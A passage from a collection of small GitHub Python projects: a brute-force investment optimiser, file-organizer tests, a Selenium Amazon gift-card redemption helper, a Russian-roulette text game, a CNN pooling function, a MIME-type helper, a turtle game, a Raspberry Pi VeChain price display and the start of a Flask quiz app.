float(line['Bénéfice_(après_2_ans)'])/100 # 7% is noted 7 in the table, as in client data\n            action_benefit_euros = action_cost * action_benefit_percent\n            actions_parameters[line['Action-#']] = [action_cost, action_benefit_euros]\n\n            # actions_prices filling\n            action_prices.append(int(line['Cout_par_action_(en_euros)']))\n\n    # print(actions_parameters[\"Action-1\"])\n\n\ndef getAListOfActionsKeys():\n    \"\"\"Returns a list of action keys corresponding to the actions_parameters dictionary\"\"\"\n\n    keys_list = []\n    for key in actions_parameters:\n        keys_list.append(key)\n    return keys_list\n\n\ndef define_all_investment_possibilities(all_investment_possibilities, actions_parameters,\n                                        keys_list):\n    \"\"\"Defines all investment possibilities (brute force algorithm)\"\"\"\n\n    # For each action there are 2 possibilities:\n    # 1. do not buy it; 2. buy it if its price is <= available_money.\n    # Stopping criterion for the recursion: 
while available_money >= the lowest remaining action price \n\n    # Chosen logic:\n    # for each action: either I buy it or I do not:\n    # turn 1 : [\"\"],[A]\n    # turn 2 : [\"\", \"\"], [\"\", B],[A, \"\"],[A, B]\n\n    # https://fr.acervolima.com/copie-de-tableaux-en-python/\n    # I need to deep-copy the tables\n\n    # Recursion sketch:\n    #myfunction(param1, param2):\n    # begin\n    # if condition then\n    # return computation\n    # else\n    # myfunction(param1, param2)\n    # return something\n    # end if\n    # end\n    #end myfunction\n\n    all_investment_possibilities_copy_for_a_loop = all_investment_possibilities.copy()\n    # for computer memory : [action-3] is not interesting if we got [0,0,3,0,0,0,0,0,0,0,0,...]\n    all_investment_possibilities.clear()\n\n    for table_of_possibilities in all_investment_possibilities_copy_for_a_loop:\n        \n        if len(keys_list) == 0: \n            break\n\n        elif len(keys_list) > 0:\n\n            # Make a copy and do not buy the action\n            table_of_possibilities_copy_without_buying = table_of_possibilities.copy()\n            table_of_possibilities_copy_without_buying.append([0,0])\n            all_investment_possibilities.append(table_of_possibilities_copy_without_buying)\n\n            # Make a copy and buy the action from actions_parameters\n            table_of_possibilities_copy_with_buying = table_of_possibilities.copy()\n            table_of_possibilities_copy_with_buying.append(actions_parameters[keys_list[0]]) \n            all_investment_possibilities.append(table_of_possibilities_copy_with_buying)\n\n            keys_list.pop(0)\n\n\ndef calculatingCostAndBenefitOfEachInvestment(all_investment_possibilities):\n    for investment_possibility in all_investment_possibilities:\n        # print(investment_possibility)\n        # >>> #[0, 0, [0, 0], [30, 0.1], [50, 0.15], [70, 0.2], [0, 0], [0, 0], [22, 0.07], ...\n        totalInvestmentCost = 0\n        totalInvestmentBenefit = 0\n\n        for action in investment_possibility:\n            # Cost\n            action_cost = action[0]\n            totalInvestmentCost += action_cost\n            # Benefit\n            action_benefit = action[1]\n            totalInvestmentBenefit += action_benefit\n\n        # Keep only the investments which respect the expenditure criterion\n        if totalInvestmentCost <= MAXIMUM_EXPENDITURE:\n            # print(\"totalInvestmentCost \",totalInvestmentCost)\n            investment_possibility.append(totalInvestmentCost)\n            investment_possibility.append(totalInvestmentBenefit)\n            all_investment_possibilities_which_respect_maximum_expenditure.append(\n                investment_possibility)\n\n\ndef comparing_each_investment_which_respect_maximum_expenditure(best_investment_actions, \n                                                                best_investment_cost, \n                                                                best_investment_benefit):\n    # highest_investment_benefit initialisation\n    highest_investment_benefit = 0\n\n    for investment in all_investment_possibilities_which_respect_maximum_expenditure:\n        if investment[-1] > highest_investment_benefit :\n            highest_investment_benefit = investment[-1] \n            best_investment_actions = investment[:-2]\n            best_investment_cost = investment[-2]\n            best_investment_benefit = investment[-1]\n    return best_investment_actions, best_investment_cost, best_investment_benefit \n\n\ndef display_best_investiment(best_investment_information):\n    \"\"\"Displays the best investment\"\"\"\n\n    best_investment_actions = best_investment_information[0]\n    best_investment_cost = best_investment_information[1]\n    best_investment_benefit = best_investment_information[2]\n\n    print(\"The BEST INVESTMENT\")\n    print(\"List of actions to buy \", best_investment_actions)\n    print(\"Total cost of the investment: \", best_investment_cost)\n    print(\"Total benefit of the investment: \", best_investment_benefit)\n\n\ndef main():\n    
start_total_time = time()\n getActionParametersFromACsvFile('part1_actions.csv')\n keys_list = getAListOfActionsKeys()\n\n start_define_all_investment_possibilities_time = time()\n for i in range(len(actions_parameters)):\n print(i)\n define_all_investment_possibilities(all_investment_possibilities, actions_parameters, \n keys_list)\n #for investment in all_investment_possibilities:\n # print(investment)\n end_define_all_investment_possibilities_time = time()\n\n start_calculatingCostAndBenefitOfEachInvestment_time = time()\n calculatingCostAndBenefitOfEachInvestment(all_investment_possibilities)\n end_calculatingCostAndBenefitOfEachInvestment_time = time()\n\n best_investment_information = comparing_each_investment_which_respect_maximum_expenditure(\n best_investment_actions, best_investment_cost, best_investment_benefit)\n display_best_investiment(best_investment_information)\n end_total_time = time()\n\n\n spent_total_time = end_total_time - start_total_time\n spent_define_all_investment_possibilities_time = end_define_all_investment_possibilities_time - start_define_all_investment_possibilities_time\n spent_calculatingCostAndBenefitOfEachInvestment_time = end_calculatingCostAndBenefitOfEachInvestment_time - start_calculatingCostAndBenefitOfEachInvestment_time\n\n print(\"spent_total_time (includes opening file, etc):\", spent_total_time)\n print(\"spent_define_all_investment_possibilities_time:\", spent_define_all_investment_possibilities_time)\n print(\"spent_calculatingCostAndBenefitOfEachInvestment_time:\", spent_calculatingCostAndBenefitOfEachInvestment_time)\n\n\nmain()\n\n","repo_name":"ThomasCreusot/OpenClassRooms_Project7","sub_path":"bruteforce.py","file_name":"bruteforce.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19729783968","text":"\"\"\" Testing the OrganizeDirectory class and its OrganizeDesktop child class. \"\"\"\nimport os\nfrom pathlib import Path\nfrom definitions import Definitions\n\n\ndef test_file_creation(org_dir) -> None:\n \"\"\" Testing the file creation functionality. \"\"\"\n # Create the Desktop & Documents directories if they don't exist. This will be the og_path.\n if not os.path.exists(Definitions.DESKTOP_PATH) or not os.path.exists(Definitions.DOCUMENTS_PATH):\n Path(Definitions.DESKTOP_PATH).mkdir(exist_ok=True)\n Path(Definitions.DOCUMENTS_PATH).mkdir(exist_ok=True)\n\n # change CWD to the desktop.\n os.chdir(org_dir._og_path)\n assert os.getcwd() == Definitions.DESKTOP_PATH\n\n # create some files.\n f1 = os.path.join(org_dir._og_path, \"img.png\")\n open(f1, 'a').close()\n f2 = os.path.join(org_dir._og_path, \"video.mp4\")\n open(f2, 'a').close()\n f3 = os.path.join(org_dir._og_path, \"audio.mp3\")\n open(f3, 'a').close()\n f4 = os.path.join(org_dir._og_path, \"pokemon.gba\")\n open(f4, 'a').close()\n\n # assert they were created, test _files().\n file_set = {\"img.png\", \"video.mp4\", \"audio.mp3\", \"pokemon.gba\"}\n file_list: list[Path] = []\n\n for file in os.listdir():\n if file[0] == \".\":\n continue\n if file in file_set:\n file_set.remove(file)\n file_list.append(Path(file))\n\n assert not file_set\n assert org_dir._files() == file_list\n\n # delete created files.\n for file in file_list:\n os.remove(file)\n\n\ndef test_folder_functionality(org_dir) -> None:\n \"\"\" Testing the folder creation and empty folder removal functionality. 
\"\"\"\n # change the CWD to the destination path.\n os.chdir(org_dir._final_path)\n assert os.getcwd() == Definitions.DOCUMENTS_PATH\n\n # test documents folder creation.\n org_dir._folders[\"rod_formats\"] = \"rods\" # this should not be created.\n org_dir._create_folders()\n\n folder_set = {\"audios\", \"videos\", \"images\", \"roms\", \"rods\"}\n for file in os.listdir():\n folder = Path(file)\n if folder.is_dir() and folder.name in folder_set:\n folder_set.remove(folder.name)\n\n assert len(folder_set) == 1 and \"rods\" in folder_set\n\n # test empty folder removal.\n org_dir._rm_empty_folders()\n assert os.getcwd() == org_dir._final_path\n non_existent_folders = [\"audios\", \"videos\", \"images\", \"roms\"]\n\n folder_set = set()\n for file in os.listdir():\n folder = Path(file)\n if folder.is_dir():\n folder_set.add(folder.name)\n\n for item in non_existent_folders:\n assert item not in folder_set\n\n\ndef test_move_files(org_dir) -> None:\n \"\"\" Testing the file moving functionality. Very important for organization. \"\"\"\n # add an extension to org_dir that isn't tied to a folder.\n org_dir._formats.formats[\"fake_format\"].add(\".mp5\")\n assert \".mp5\" in org_dir._formats.formats[\"fake_format\"]\n\n # change CWD to the desktop, create fake mp5 video file.\n os.chdir(org_dir._og_path)\n assert os.getcwd() == Definitions.DESKTOP_PATH\n\n # create files for moving.\n ext_set = set() # will use later to assert file creation.\n\n for f_type in org_dir._formats.formats:\n file_name = f_type.split(\"_\")[0] # audio, video, image, rom w/ each of their ext\n for f_ext in org_dir._formats.formats[f_type]:\n # populate the ext_set\n ext_set.add(f_ext)\n # file creation\n cur_file = os.path.join(org_dir._og_path, file_name + f_ext)\n open(cur_file, 'a').close()\n\n # assert that the files were created.\n assert ext_set\n file_list = [] # these files will be moved later.\n\n for item in os.listdir():\n file = Path(item)\n if not file.suffixes:\n continue\n\n file_list.append(file)\n\n cur_ext = \"\".join(file.suffixes)\n if cur_ext in ext_set:\n ext_set.remove(cur_ext)\n\n assert not ext_set\n\n # create folders, move the files, delete empty folders\n org_dir._create_folders()\n org_dir._move_files(file_list)\n\n os.chdir(org_dir._final_path)\n Path(\"test_dir\").mkdir(exist_ok=True) # this should be deleted.\n org_dir._rm_empty_folders()\n\n # assert that the folders exist.\n folder_set = set()\n for item in os.listdir():\n folder = Path(item)\n if folder.is_dir():\n folder_set.add(folder.name)\n\n assert \"test_dir\" not in folder_set\n assert \"audios\" in folder_set and \"images\" in folder_set and \"roms\" in folder_set and \"videos\" in folder_set\n\n # ensure that files were moved part 1. check the og_path.\n os.chdir(org_dir._og_path)\n\n file_set = set(file_list)\n for item in os.listdir():\n file = Path(item)\n if file.is_dir() or not file.suffixes:\n continue\n else:\n assert file.name not in file_set\n\n # ensure that files were moved part 2. 
check the final_path.\n os.chdir(org_dir._final_path)\n\n assert os.path.exists(f\"{org_dir._final_path}/fake.mp5\")\n os.remove(f\"{org_dir._final_path}/fake.mp5\")\n\n for file_type in org_dir._folders:\n os.chdir(org_dir._final_path + \"/\" + org_dir._folders[file_type])\n for item in os.listdir():\n file = Path(item)\n if file in file_set:\n os.remove(file)\n file_set.remove(file)\n\n assert file_set.pop().name == \"fake.mp5\"\n assert not file_set\n\n # end, delete all files from created folders.\n org_dir._rm_empty_folders()\n","repo_name":"rod608/fileorg_oop_docker","sub_path":"tests/test_organize.py","file_name":"test_organize.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70056411257","text":"import os\nimport json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.chrome.options import Options\n\n## CONSTANT\nURL = 'https://www.amazon.com/'\nFILE = os.path.join(os.getcwd(),'LOGIN.json')\n# DRIVER_PATH = os.path.join('edgedriver_linux64','msedgedriver')\nDRIVER_PATH = os.path.join('utility','edgedriver_win64','msedgedriver.exe')\n\n\n## public method\n# LOGIN.json contains the passward and email for amazon account.\ndef login_info():\n with open(FILE,'r') as f:\n info = json.load(f)\n return info['email'] , info['passward'] # email , passward\n\n## Obj class\nclass AutoAmaz(object):\n\n def __init__ (self):\n self.driver = webdriver.Edge(DRIVER_PATH)\n self.wait = WebDriverWait(self.driver,500)\n self.driver.implicitly_wait(10)\n self.driver.get(URL)\n\n # activate the log-in page\n self.wait.until(\n EC.presence_of_element_located((By.XPATH,'//*[@id=\"nav-link-accountList\"]/span'))).click()\n self.login_page()\n\n # navigate to \"Your Account\"\n self.driver.find_element(By.XPATH,'//*[@id=\"nav-link-accountList\"]/span').click()\n\n # navigate to Gift cards page\n self.driver.find_element(By.PARTIAL_LINK_TEXT,\"balance\").click()\n # Then, redeem\n self.driver.find_element(By.LINK_TEXT,\"Redeem a Gift Card\").click()\n # once we get the code, paste on the Entry bar.\n # and Click \"Apply\"\n\n # When 'id = alertRedemptionSuccess' appear, clip 'class = a-alert-heading'\n # and driver.save_screenshot()\n # element = self.wait.until(EC.presence_of_elements_located((By.ID,'gc-redemption-form-heading')))\n\n\n def _is_read(self):\n try:\n element = self.wait.until(EC.presence_of_elements_located((By.ID,'gc-redemption-form-heading')))\n \n except NoSuchElementException:\n \n return False\n\n return True\n\n def login_page(self):\n # we need to deal with the situation\n # once we naviated to login-page\n # determine if it is login-page.\n # then, just login again.\n try:\n self.driver.find_element(By.CLASS_NAME,\"a-spacing-small\")\n\n ## prepare the login info\n email, pswd = login_info()\n\n ## navigate to login page...s\n ## on the login page, first is the accound name, email\n\n self.driver.find_element(By.ID , 'ap_email').send_keys(email,Keys.RETURN)\n\n ## on the passward, then enter the passward.\n self.driver.find_element(By.ID , 'ap_password').send_keys(pswd,Keys.RETURN)\n ## ...Now, we are successfully login to one 
account.\n        except NoSuchElementException:\n            print(\"We are not at login-page.\")\n\n        return None\n    def redeem_gift_card(self,code,PATH = None):\n        '''\n        While we are on the redeem-gift-card page, locate the claim_code field and paste\n        the code into the input field. The page might not be stable and may need to log in again;\n        once an exception occurs, attempt to log in again.\n        '''\n        try:\n            if self.driver.find_element(By.ID,'gc-redemption-apply-button').is_enabled():\n                claim_code = self.driver.find_element(By.NAME,'claimCode')\n                claim_code.clear() # clear the previously entered code\n                # paste the code on the redemption-input, and apply.\n                claim_code.send_keys(code)\n                #claim_code.send_keys(Keys.ENTER)\n\n                # When 'id = alertRedemptionSuccess' appear, clip 'class = a-alert-heading'\n                # and driver.save_screenshot()\n        except NoSuchElementException:\n            # once we cannot locate the element, it may have navigated to the login page again,\n            # so apply login_page().\n            self.login_page()\n\n        finally:\n            ## whatever happens, take a screenshot.\n            file_path_name = os.path.join(PATH,f'{code}.png')\n            self.driver.save_screenshot(file_path_name)\n\nif __name__ == '__main__':\n    test = AutoAmaz()\n","repo_name":"Deamerrong123/AutoAmz","sub_path":"AutoAmaz.py","file_name":"AutoAmaz.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3469019027","text":"import random\nimport time\n\ndef rouletteIntro():\n    name = input(\"Hello there brave one! What is your name?\\n \")\n    print(\"You are about to play Russian Roulette!\")\n    time.sleep(1)\n    print(\"Your goal is to get the highest amount of blank shots without dying!\")\n    print(\"So if you get all 7 blanks, you win!\")\n    time.sleep(1)\n    print(\"So \" + name + \", let the games begin..\")\n\n    bulletChamber = random.randint(1,8)\n\n    return bulletChamber\n\ndef pickChamber(loadedChamber):\n    dead = 0\n    chosenChambers = set()\n\n    while dead == 0:\n        chamberCount = len(chosenChambers)\n        chambersLeft = 8 - chamberCount\n        chambersLeft = str(chambersLeft)\n        score = str(chamberCount)\n        print(\"There are \" + chambersLeft + \" chambers left.\")\n\n\n        if chamberCount == 7:\n            print(\"Congratulations! Your prize is..\")\n            time.sleep(3)\n            print(\"BANG!\")\n            time.sleep(2)\n            print(\"You've survived \" + score + \" shots.\")\n            dead = 1  # end the round after a full win (the original set an unused 'shot' variable, which looped forever)\n\n        else:\n            chamber = input(\"Pick a chamber from 1 - 8.\\n\")\n            chamber = int(chamber)\n\n            if chamber < 1 or chamber > 8:\n                print(\"Fuck off.\")\n\n            elif chamber == loadedChamber:\n                print(\"...\")\n                time.sleep(3)\n                print(\"BANG!\")\n                time.sleep(2)\n                print(\"You've survived \" + score + \" shots.\")\n                dead = 1\n\n            elif chamber != loadedChamber:\n                print(\"...\")\n                time.sleep(5)\n                print(\"'click'\")\n                chosenChambers.add(chamber)\n\n\n\nplay = \"y\"\nwhile play == \"y\" or play == \"Y\":\n\n    chamber = rouletteIntro()\n\n    pickChamber(chamber)\n\n    play = input(\"Would you like to play again?(y/n)\\n\")\n","repo_name":"QuiEgo/Russian-Roulette","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"11468514121","text":"#!/usr/bin/env python3\n\"\"\" This module contains the function pool_forward. 
\"\"\"\nimport numpy as np\n\n\ndef pool_forward(A_prev, kernel_shape, stride=(1, 1), mode='max'):\n \"\"\"\n Performs forward propagation over a pooling layer of a neural network.\n A_prev is a numpy.ndarray of shape (m, h_prev, w_prev, c_prev) containing\n the output of the previous layer.\n m is the number of examples.\n h_prev is the height of the previous layer.\n w_prev is the width of the previous layer.\n c_prev is the number of channels in the previous layer.\n kernel_shape is a tuple of (kh, kw) containing the size of the kernel for\n the pooling.\n kh is the kernel height.\n kw is the kernel width.\n stride is a tuple of (sh, sw) containing the strides for the pooling.\n sh is the stride for the height.\n sw is the stride for the width.\n mode is a string containing either max or avg, indicating whether to\n perform maximum or average pooling, respectively.\n Returns: the output of the pooling layer.\n \"\"\"\n kh, kw = kernel_shape\n m, h_prev, w_prev, c_prev = A_prev.shape\n sh, sw = stride\n if mode == 'max':\n pool = np.max\n else:\n pool = np.average\n ansh = int((h_prev - kh) / sh + 1)\n answ = int((w_prev - kw) / sw + 1)\n ans = np.zeros((m, ansh, answ, c_prev))\n for i in range(ansh):\n for j in range(answ):\n x = i * sh\n y = j * sw\n ans[:, i, j, :] = pool(A_prev[:, x: x + kh, y: y + kw, :],\n axis=(1, 2))\n return ans\n","repo_name":"Daransoto/holbertonschool-machine_learning","sub_path":"supervised_learning/0x07-cnn/1-pool_forward.py","file_name":"1-pool_forward.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23233769904","text":"import mimetypes\nimport subprocess\nfrom pathlib import Path\n\nfrom sweeper.app.common.types import MIME, UndefinedMimeType\nfrom sweeper.infrastructure.system_logger import logger\n\n\nclass MimeTyper:\n def from_file(self, source_file_path: Path) -> MIME:\n # mime_type, _ = mimetypes.guess_type(source_file_path.as_posix())\n mime_type = subprocess.run(\n [\"file\", \"-b\", \"--mime-type\", source_file_path.as_posix()], capture_output=True\n ).stdout.decode()\n major_mime = UndefinedMimeType\n\n if mime_type:\n try:\n major_mime = self._get_major_mimetype(mime_type)\n except Exception as ex:\n logger.error(ex, source_file_path)\n\n return major_mime\n\n def _get_major_mimetype(self, stdout: str) -> MIME:\n \"\"\"Разделение полученного результат от команды `file` на основной тип и подтип. 
 +{"seq_id":"23233769904","text":"import mimetypes\nimport subprocess\nfrom pathlib import Path\n\nfrom sweeper.app.common.types import MIME, UndefinedMimeType\nfrom sweeper.infrastructure.system_logger import logger\n\n\nclass MimeTyper:\n    def from_file(self, source_file_path: Path) -> MIME:\n        # mime_type, _ = mimetypes.guess_type(source_file_path.as_posix())\n        mime_type = subprocess.run(\n            [\"file\", \"-b\", \"--mime-type\", source_file_path.as_posix()], capture_output=True\n        ).stdout.decode()\n        major_mime = UndefinedMimeType\n\n        if mime_type:\n            try:\n                major_mime = self._get_major_mimetype(mime_type)\n            except Exception as ex:\n                logger.error(ex, source_file_path)\n\n        return major_mime\n\n    def _get_major_mimetype(self, stdout: str) -> MIME:\n        \"\"\"Split the result returned by the `file` command into a major type and a subtype. Return the major type.\n\n        :param stdout: Output of the `file` command\n        \"\"\"\n        major_type, subtype = stdout.split(\"/\", maxsplit=1)\n\n        return MIME(major_type)\n","repo_name":"kolesnikov-bn/sweeper","sub_path":"sweeper/app/common/utils/mime_typer.py","file_name":"mime_typer.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72682536375","text":"# **********************************************************************************************************\n# Crypto Tracker\n# by @cloudchamber4\n# 24 April 2021\n# **********************************************************************************************************\n# Hardware Used (~$25 USD): \n#\n# Raspberry Pi Zero W: \n# ( https://www.raspberrypi.org/products/raspberry-pi-zero-w/ )\n#\n# Adafruit Mini PiTFT 135x240 Color Display \n# ( https://shop.pimoroni.com/products/adafruit-mini-pitft-135x240-color-tft-add-on-for-raspberry-pi )\n# \n# **********************************************************************************************************\n# RPI Configuration Steps:\n#\n# Lots of tutorials out there far better than mine, but below are the key steps\n#\n# \t(Use raspi-config GUI to Enable the SPI Interface)\n#\tsudo raspi-config \n#\n# \t(Add two key libraries...)\n#\tgit clone https://github.com/adafruit/Adafruit_CircuitPython_Bundle.git\n#\tgit clone https://github.com/adafruit/circuitpython.git\n#\t\n# \t(From )\n# \tsudo apt install ntp\n#\tsudo systemctl status ntp\n#\t \n# \t(Install Python 3)\n#\tsudo apt-get install python3-pip\n#\tcd Adafruit_CircuitPython_Bundle/\n#\t\n# \t(This next step takes ~33 minutes!)\n#\tsudo ./update-submodules.sh \n#\tcd ..\n#\t\n# \t(See Adafruit RGB Display Library Documentation)\n# \t( https://buildmedia.readthedocs.org/media/pdf/adafruit-circuitpython-rgb-display/latest/adafruit-circuitpython-rgb-display.pdf)\n# \tsudo pip3 install adafruit-circuitpython-rgb-display\n#\t \n# \t(DejaVu Font family based on the Vera Fonts)\n#\tsudo apt-get install ttf-dejavu\n#\t\n#\t(PIL is the Python Imaging Library) \n#\tsudo apt-get install python3-pil\n#\t\n# \t(Python Numpy Library)\n#\tsudo apt-get install python3-numpy\n# **********************************************************************************************************\n#\t \n# Copy this document over to your RPI via Putty PSFTP ( https://www.puttygen.com/psftp )\n#\t\n#\t1.) (Obtain IP address of RPI) \n#\t ifconfig\n#\t2.) (Open PSFTP on laptop)\n#\t3.) (Open the connection between your computer and your RPI)\n#\t open 192.168.1.39\n#\t4.) (Point to your local directory where this file is saved)\n#\t lcd c:/fromRPI\n#\t5.) copy this file to your RPI\n#\t put vet-track.py\n# 6.) (Make the python file executable)\n# sudo chmod +x vet-track.py\n# 7.) 
(Make this python file run at every reboot automatically)\t\n# sudo nano /etc/rc.local\n# (add the below line of code to your rc.local file...)\n# sudo python3 /home/pi/stats_time.py &\n# **********************************************************************************************************\n#Code below:\nimport time\nimport subprocess\nimport digitalio\nimport board\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\nimport json\nimport cfscrape\n\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = None\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 64000000\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(spi, cs=cs_pin, dc=dc_pin, rst=reset_pin, baudrate=BAUDRATE,\nwidth=135, height=240, x_offset=53, y_offset=40)\n\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for full color.\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\nimage = Image.new('RGB', (width, height))\nrotation = 90\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\ndisp.image(image, rotation)\n\n# Draw some shapes.\n# First define some constants to allow easy resizing of shapes.\npadding = -2\ntop = padding\nbottom = height-padding\n\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n\n# Alternatively load a TTF font. Make sure the .ttf font file is in the\n# same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\nfont = ImageFont.truetype('/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf', 24)\n\n# Turn on the backlight\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\n\n#primary loop...\nwhile True:\n\t# Crypto Tracker\n\tscraper = cfscrape.create_scraper()\n\turl = 'https://api.cryptonator.com/api/ticker/vet-usd'\n\tcfurl = scraper.get(url).content\n\n\tdata = json.loads(cfurl)\n\n\tcoin = data['ticker']['base']\n\tcurrency = data['ticker']['target']\n\tprice = data['ticker']['price'][0:6] #First 4 decimal places\n\tvolume = data['ticker']['volume']\n\tchange = data['ticker']['change'][0:5]\n\tfloat_change = 100 * float(change)\n\tstring_change = str(float_change)\n\n\t# Draw a black filled box to clear the image.\n\tdraw.rectangle((0, 0, width, height), outline=0, fill=0)\n\n\t# Shell scripts for system monitoring from here:\n\t# https://unix.stackexchange.com/questions/119126/command-to-display-memory-usage-disk-usage-andcpu-load\n\n \t#1 TITLE:\n\tcmd = \"echo VeChain Tracker\"\n\tTitle = subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n\t#2 Time:\n\tcmd = \"date +%H:%M:%S | cut -d\\' \\' -f1\"\n\tTime = \"TIME: \"+subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n \t#3 Date:\n\tcmd = \"date -I | cut -d\\' \\' -f1\"\n\tDate = \"DATE: \"+subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n \t#4 COIN:\n\tcmd = \"echo coin\"\n\tCoin = \"COIN: \"+subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n \t#5 Price:\n\tPrice = \"VeChain: \" + price\n\n \t#6 % Change:\n\tChange = \"%Ch. 
1-hr: \" + string_change + \"%\"\n\n\t# Write five lines of text.\n\ty = top\n\n\t#1st LINE:\n\t#TITLE\n\tdraw.text((x,y), Title, font=font, fill=\"#6495ED\") #CornFlowerBlue\n\ty += font.getsize(Title)[1]\n\n\t#2nd LINE:\n\t#DATE\n\tdraw.text((x, y), Date, font=font, fill=\"#FFFAFA\") #Snow White\n\ty += font.getsize(Date)[1]\n\n \t#3rd LINE:\n\t#TIME\n\tdraw.text((x, y), Time, font=font, fill=\"#FFFF00\") #Yellow\n\ty += font.getsize(Time)[1]\n\n\t#4th LINE\n\t#PRICE\n\tdraw.text((x, y), Price, font=font, fill=\"#00FA9A\") #Medium Spring Green\n\ty += font.getsize(Price)[1]\n\n\t#5th Price:\n\t#% CHANGE (past 1-hr)\n \t#Color Code %change, with \"+%\" = Green; \"-%\"=RED\n\tif float_change > 0:\n\t\tdraw.text((x, y), Change, font=font, fill=\"#00FF00\") #Lime Green\n\telse:\n\t\tdraw.text((x, y), Change, font=font, fill=\"#DC143C\") #Crimson\n\ty += font.getsize(Change)[1]\n\n\t# Display image.\n\tdisp.image(image, rotation)\n\n\t# Update every 500ms...\n\ttime.sleep(.5)\n","repo_name":"citius1974/vet-tracker","sub_path":"vet-track.py","file_name":"vet-track.py","file_ext":"py","file_size_in_byte":6691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"43364573028","text":"from turtle import Turtle\nfrom random import randint, choice\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n\n def __init__(self):\n self.cars = [Turtle() for _ in range(15)]\n self.speed = STARTING_MOVE_DISTANCE\n self.spawn_cars()\n\n def spawn_cars(self):\n for car in self.cars:\n car.color(choice(COLORS))\n car.shape(\"square\")\n car.penup()\n car.shapesize(1, 2)\n car.goto(300 + randint(0, 300), randint(-260, 200))\n car.setheading(180)\n\n def move_cars(self):\n for car in self.cars:\n if car.xcor() < -320:\n car.goto(300 + randint(0, 200), randint(-260, 200))\n car.forward(self.speed)\n\n def increase_speed(self):\n self.speed += MOVE_INCREMENT\n\n\n","repo_name":"DachiB-git/turtle_crossing","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74965512696","text":"from flaskApp.backend.config import app,db,login_manager\nfrom flaskApp.backend.models.questionModel import Question\nfrom flaskApp.backend.models.userModel import User\nfrom flaskApp.backend.models.quizModel import Quiz\nfrom flaskApp.backend.models.userAnswerModel import UserAnswer\nfrom flask import render_template,request,redirect,url_for\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm.exc import NoResultFound\nimport requests\nfrom flask_login import login_user, logout_user, current_user, login_required\n\n@app.route('/')\ndef index():\n return render_template('index.html',current_user=current_user)\n\n\nwith app.app_context():\n db.drop_all()\n db.create_all()\n\n quiz1 = Quiz(\n name=\"Python'da AI Geliştirme Sınavı\"\n )\n\n quiz2 = Quiz(\n name=\"Bilgisayar Görüşü Sınavı\"\n )\n\n quiz3 = Quiz(\n name=\"NLP (Nöro-Dilbilim) Sınavı\"\n )\n\n quiz4 = Quiz(\n name=\"Python Uygulamalarında AI Modelleri Sınavı\"\n )\n\n db.session.add_all([quiz1, quiz2, quiz3, quiz4])\n\n q1 = Question(\n question_text=\"Bir makine öğrenimi projesine başlamadan önce, veri ön işleme neden önemlidir?\",\n quiz_id=1, \n option1=\"Veri modelleme işlemleri daha hızlı gerçekleştirilir.\",\n option2=\"Verileri daha hızlı bir şekilde toplamak 
